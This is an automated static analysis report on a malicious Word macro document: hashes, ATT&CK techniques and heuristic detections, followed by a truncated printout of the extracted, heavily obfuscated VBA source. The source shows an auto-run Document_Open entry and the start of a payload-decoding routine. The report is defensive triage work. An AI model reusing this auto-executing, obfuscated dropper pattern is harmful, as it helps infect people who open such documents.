Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 45dbb91b898d3db2…

MALICIOUS

Office (OOXML)

Size: 41.9 KB
Created: 2018-10-17 16:47:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-09-30
MD5: f80eedbee0117a41c8cdb96cf1b43448
SHA-1: 3e092341632778eefa6655a5d59500118e5568b9
SHA-256: 45dbb91b898d3db2028bd91ae4de855a5f4f297a9d77b5e1d253a80342d1968f
Risk Score: 184

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample is an OOXML document containing a VBA macro that executes automatically when the document is opened, as indicated by the Document_Open macro and Shell() call findings. The document body presents a fake order form that instructs the user to 'enable content' to view details, a common lure for macro-based malware. The VBA script likely downloads and executes a second-stage payload, although the specific download URL or execution command is obfuscated within the script.

Heuristics (7)

  • VBA project inside OOXML (medium, 3 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • Document_Open macro (high) [OLE_VBA_DOCOPEN]
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Macro/content-enable lure (medium) [SE_ENABLE_LURE]
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 13805 bytes
SHA-256: 12f1b834c204514c87c3bb4ac0682f92cf09d173c7fbee33796401cf5c5cfbe3
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
If 56 < 220 Then
' mDOpa
Else
' Cy2z79WKO
Debug.Print "QoRNLqcVP"
End If
Dim Tera3E
Tera3E = 26
While Tera3E <= 746
Tera3E = Tera3E + 59
Wend
eCnKsQ = 26387
U5WMkUaBJ = yGrSPigs5 & Tera3E
Dim yhRyMkErG
yhRyMkErG = 190
While yhRyMkErG <= 386
yhRyMkErG = yhRyMkErG + 41
Wend
eeZIM = "wDr8Q"
zbFNjRrU = skP9u & yhRyMkErG
Dim djoJV
djoJV = 190
While djoJV < 386
djoJV = djoJV + 41
Wend
OTrWfp = "tS4gXr"
vXEOtPBR = V0OanRZ & djoJV
Dim aHgdp As Object
Dim Od63WkKb
Od63WkKb = 129
While Od63WkKb <= 390
Od63WkKb = Od63WkKb + 7
Wend
V8U3OxoYm = 8474
Bw6TM = L9ZQwf2aA & Od63WkKb
Dim wRncv
wRncv = 103
While wRncv <= 521
wRncv = wRncv + 57
Wend
BkOCfYIyG = "nA5lyd9"
WInQKG = bvTfcPKW & wRncv
If 23 < 134 Then
' Npch45
Else
' zZ91BFmN
Debug.Print "hn2RBw"
End If
Set aHgdp = New frmMain
If 53 < 155 Then
' KCs3mSZ
Else
' rW7mMrnwZ
MsgBox "sHb23G06"
End If
If 52 < 174 Then
' UqM9lzn8
Else
' xUmTPXMhc
MsgBox "ZEOyC0NdV"
End If
If 52 < 174 Then
' pkHCpUaGb
Else
' teKtmES
MsgBox "NrKl5"
End If
Call Initialize(aHgdp.txtBox.Text)
End Sub

Attribute VB_Name = "vQV3ywROB"
Sub Initialize(XbhpD As String)
If 36 < 174 Then
' uhJQNSzq
Else
' KY3CKnf
MsgBox "iH21C"
End If
If 31 < 177 Then
' mSHAyONj
Else
' UsDZSJ
MsgBox "pCUS28"
End If
Dim BTboqS
BTboqS = 91
While BTboqS <= 707
BTboqS = BTboqS + 33
Wend
UHr4cRx7o = 59773
EO6wyU = Rc5MUVEnr & BTboqS
Dim k67bCYIMy
k67bCYIMy = 91
While k67bCYIMy <= 707
k67bCYIMy = k67bCYIMy + 33
Wend
FYdvBtw = 59773
aZmzwI = GfCadShRq & k67bCYIMy
Dim HGC2im
HGC2im = 169
While HGC2im <= 271
HGC2im = HGC2im + 8
Wend
NGcLDyw = 3591
qRhzbu = ZZgTpoEcR & HGC2im
On Error Resume Next
If 23 < 158 Then
' eZNvyzM4d
Else
' YObSRmG
Debug.Print "EGgZH"
End If
If 26 < 233 Then
' XKJ1xAnuO
Else
' T5fRyesx
Debug.Print "UUtTvk"
End If
If 26 < 233 Then
' kUCLVB
Else
' n4BKhH
MsgBox "uZp1RGX"
End If
Dim qtHbZjfy
qtHbZjfy = 94
While qtHbZjfy < 870
qtHbZjfy = qtHbZjfy + 32
Wend
Vch7n = "e0Sod"
ezdbEIpk = xA0QRux8M & qtHbZjfy
Dim wVH5QPn0
wVH5QPn0 = 94
While wVH5QPn0 <= 870
wVH5QPn0 = wVH5QPn0 + 32
Wend
W8RK0 = "rzMh9t"
s5bJPVE6y = G1A9uth & wVH5QPn0
If 12 < 181 Then
' Mh8Sid
Else
' BCUWzbnc
Debug.Print "P0Nui4"
End If
If 12 < 181 Then
' EStx4dTQJ
Else
' uiSnApk8
Debug.Print "DAMWaVi"
End If
If 29 < 237 Then
' LtjuYZ
Else
' vgi9nGC
Debug.Print "iFIDmB"
End If
If 29 < 237 Then
' gxF6DJX
Else
' pLqFg
Debug.Print "iU03IPkM"
End If
If 22 < 191 Then
' FlZoBh6I9
Else
' xU0nLu3c9
Debug.Print "m1wmD"
End If
Dim pBpAjxN0o
pBpAjxN0o = 32
While pBpAjxN0o < 960
pBpAjxN0o = pBpAjxN0o + 3
Wend
fewcAK0 = 46918
U3RXn = Gwv2ux & pBpAjxN0o
If 58 < 199 Then
' O35W8ko9a
Else
' xVQ65TH
MsgBox "Zq5Qkj4"
End If
If 58 < 199 Then
' i2Mp1
Else
' zydV0
MsgBox "EKp1Gsa"
End If
If 33 < 172 Then
' adOWDzITY
Else
' bVdS3WGNa
MsgBox "tLiPC6Zv"
End If
XbhpD = c8hPt2ywU(XbhpD)
Dim A4g5ScW
A4g5ScW = 234
While A4g5ScW <= 839
A4g5ScW = A4g5ScW + 22
Wend
BthZpOFb = 48524
oml86 = YvpGK & A4g5ScW
Dim j2CGPWE4
j2CGPWE4 = 234
While j2CGPWE4 < 839
j2CGPWE4 = j2CGPWE4 + 22
Wend
pOHnWt5PG = "ItZea0RkD"
cor5KJdDW = EyOzdLIQv & j2CGPWE4
XbhpD = StrConv(XbhpD, vbUnicode)
Dim CTknGqo2
CTknGqo2 = 239
While CTknGqo2 < 621
CTknGqo2 = CTknGqo2 + 42
Wend
khgs2fKI = 6579
YFjXVki = PhBJXDmF & CTknGqo2
Dim IKLCi
IKLCi = 30
While IKLCi <= 337
IKLCi = IKLCi + 52
Wend
s3rW4R0PM = "B3L09u"
Ief6C085s = EH5cux & IKLCi
If 24 < 143 Then
' B7czm80V
Else
' V03g5y9
MsgBox "IhitPS8x"
End If
Dim arK4wo3L
arK4wo3L = 54
While arK4wo3L < 895
arK4wo3L = arK4wo3L + 32
Wend
hoLJ5eKv = "NE6Vs"
U52rtYG = ANzRbk & arK4wo3L
If 38 < 227 Then
' W0mQDw
Else
' Zc8qGRA3
Debug.Print "rJhM9bCf
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 53248 bytes
SHA-256: e13d827ef017875b850f029ea014023bd58d50d3256cef8b28f2e838a9a59e04
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).